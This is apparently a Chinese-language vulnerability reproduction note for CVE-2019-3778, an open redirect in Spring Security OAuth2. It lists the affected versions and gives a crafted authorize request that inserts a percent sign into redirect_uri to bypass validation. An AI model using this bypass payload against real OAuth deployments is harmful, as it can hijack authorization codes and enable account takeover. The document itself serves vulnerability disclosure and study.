# CVE-2019-3778 Spring Security OAuth2 开放重定向
### 一、漏洞简介
限制条件:
有问题的Spring Security OAuth2版本
oAuth认证使用授权码模式
用户需要在登录的情况下
### 二、漏洞影响
* Spring Security OAuth 2.3 to 2.3.4
* Spring Security OAuth 2.2 to 2.2.3
* Spring Security OAuth 2.1 to 2.1.3
* Spring Security OAuth 2.0 to 2.0.16
### 三、复现过程
用户登录后,CLIENT APP执行的以下请求包含REDIRECT_URI参数。 只需添加一个百分号即可触发重定向,而不是通过RedirectMismatchException错误来绕过验证。
例如原始请求如下:
“`bash
/auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://localhost:8086/login
“`
只需要修改为:
“`bash
/auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://%localhost:8086/login
“`
这样就不会产生原本的认证错误,而且直接跳转到地址
“`bash
Location: http://localhost:8086/login
“`
请登录后查看评论内容